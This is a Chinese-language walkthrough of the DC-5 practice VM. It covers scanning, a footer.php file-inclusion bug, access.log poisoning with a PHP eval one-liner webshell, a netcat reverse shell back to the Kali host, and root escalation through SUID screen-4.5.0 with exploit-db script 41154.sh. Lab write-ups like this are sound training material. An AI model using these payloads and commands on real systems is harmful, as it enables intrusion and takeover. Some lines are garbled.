龙空技术网

DC-5靶场提权教程

网盾网络安全培训 119

前言:

而今小伙伴们对“footerphp”大概比较讲究,小伙伴们都需要了解一些“footerphp”的相关文章。那么小编也在网络上收集了一些关于“footerphp””的相关知识,希望朋友们能喜欢,同学们快快来学习一下吧!

DC-5

1.取得靶机,将靶机复制在自己电脑上,打开靶机

选择编辑此虚拟机,点击网络配适器,选择NAT模式然后确定

开启此虚拟机

到这步后我们开启kali虚拟机,同样选择编辑此虚拟机,点击网络配适器,选择NAT模式然后确定

打开kali虚拟机,其密码为kali

我们先获取root权限,输入su root,password为123456(Linux内输入password是看不见的)

先用ifconfig查看kali的ip地址为192.168.126.129

我们用nmap扫描收集信息,输入nmap -sP 192.168.126.0/24 -oN nmap.sV

得到靶机ip:192.168.126.132,对其进行端口扫描

可以看到开放了80端口和111端口,111端口是RPC服务,感觉没有什么可以利用的点,我们去浏览器访问80端口试试(可以打开kali自带的火狐浏览器,使用kali自带浏览器前需要打开burpsuit,也可以用自己电脑的浏览器)

输入刚刚获得的靶机ip,例如我的就是

发现这是一个动态页面,可以尝试去提交一些东西。

我们点击右上角Contact,往下滑发现可以输入

提交后可以发现,本人电脑的Microsoft Edge因为改成了翻译系统,一般情况会显示DC-5 is alive

扫描web目录,输入dirb

很可惜此处没有太多有价值的东西,继续浏览可以发现contact可以发现年份会随着页面刷新而刷新

之前在thinkyou.php中看到了这种情况(网页刷新一次,年份都会发生变化),因此我们猜测thinkyou.php调用了footer.php,于是想到了文件包含漏洞,输入footer.php试试

看见页面变化,我们回到kali,用kali自带的burpsuite进行抓包

关于burpsuite的详细配置教程我放在另外一个文档里面,没有配置的小伙伴可以先配置一下

打开burpsuite后,返回浏览器界面

在开着intercept on的同时刷新浏览器页面(回到浏览器按下f5)burp会自动抓包

点击Action,选择send to Repeater发送到Repeater

利用access.log。抓包在burpsuite-repeater中,把url修改为一句话木马 Get <?php phpinfo();?> ,回显400 bad request

返回浏览器查看,哭看见页面发生变化

滑到最底下是这样的,可以看见显示了php信息,意识到可以通过这个方式写入木马

我们返回burpsuite,写入一句话木马 GET <?php @eval($_POST['1234'];?> .

(注意,这里的POST['']里面的内容是可以更改的,也就是之后用蚁剑连接的密码

接着我们使用蚁剑连接,此处我的蚁剑是windows版本的,所以密码就是POST内的内容1234

点击添加数据

点击测试连接,可以看见连接成功

我们回到kali,输入nc -lvvp 1234开启这个端口的监听

然后在蚁剑中,点击右键,选择虚拟终端,输入nc -e /bin/bash 192.168.126.129 1234进行shell反弹

可以在kali中看见成功

返回kali交互式 输入python -c 'import pty;pty.spawn("/bin/bash")'

使用find / -perm -4000 2>/dev/null查找具有SUID权限的文件,发现screen-4.5.0。

使用searchsploit查找该命令漏洞:searchsploit screen 4.5.0 -w

两个文件是相同的,41152.txt是告诉你怎么做,之前的靶机也出现过,显然41154.sh已经把文件给了,所以选择下载41154.sh

发现有两个漏洞

先查看第一个

将第一个复制到桌面

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

查看该文件

发现其在 /tmp 路径下编译了两个 c,并执行了若干命令

按照脚本提示,先将第一部分内容写到libhax.c中(一共有三个部分)

第一步在桌面创建一个文件夹存放三个部分的脚本

使用命令vim创建第一个libhax.c

然后编译这个脚本

gcc -fPIC -shared -ldl -o libhax.so libhax.c

使用vim命令创建第二个rootshell.c,复制粘贴完内容后按下esc输入:wq保存退出

再编译

gcc -o rootshell rootshell.c

最后一个部分dc5.sh同理,但是需要注意的是下面需要转换一下格式

执行完命令后,可以看见在桌面home/dc-5文件夹有五个文件

将带有.c的文件删除,在kali中使用rm命令

再回到文件夹内可以看见

然后我们回到中国蚁剑,将文件上传到tmp文件里面,需要注意的是我们一定要讲文件传到根目录下,而不是var,/var是源码

然后重命名,将路径去掉

回到kali反弹的shell(步骤和之前一样),进入到天麻片、目录里面

然后为dc5.sh添加可以执行权限,输入chmod +x dc5.sh

验证权限,切换到/root根目录下找到flag,渗透成功

标签: #footerphp #文件上传路径burp改